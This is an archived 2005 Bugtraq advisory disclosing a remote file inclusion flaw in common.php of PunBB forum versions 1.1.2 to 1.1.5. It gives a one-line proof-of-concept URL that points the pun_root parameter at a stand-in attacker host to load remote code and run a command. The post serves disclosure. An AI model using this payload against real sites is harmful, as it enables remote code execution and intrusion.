[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Remote File Inclusion in forum PunBB

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Remote File Inclusion in forum PunBB
From: "rod hedor" <rodhedor@xxxxxxxxxxx>
Date: Mon, 24 Oct 2005 01:57:40 +0000


Remote File Inclusion in forum PunBB

Date:24/10/2005

Severity: High

version: 1.1.2 >> 1.1.5

The bug reside in common.php

Exploit :

http://www.host.com/forum/include/common.php?pun_root=http://www.host_evil.com/cmd?&=id


Discovery by RoDheDoR

L-G-H Team

http://www.lezr.com

_________________________________________________________________ FREE pop-up blocking with the new MSN Toolbar - get it now! http://toolbar.msn.click-url.com/go/onm00200415ave/direct/01/

Prev by Date: DCP - portal XSS & SQL attacks
Next by Date: Advisory 16/2005: phpMyAdmin Local File Inclusion Vulnerability
Previous by thread: DCP - portal XSS & SQL attacks
Next by thread: Re: Remote File Inclusion in forum PunBB
Index(es):
- Date
- Thread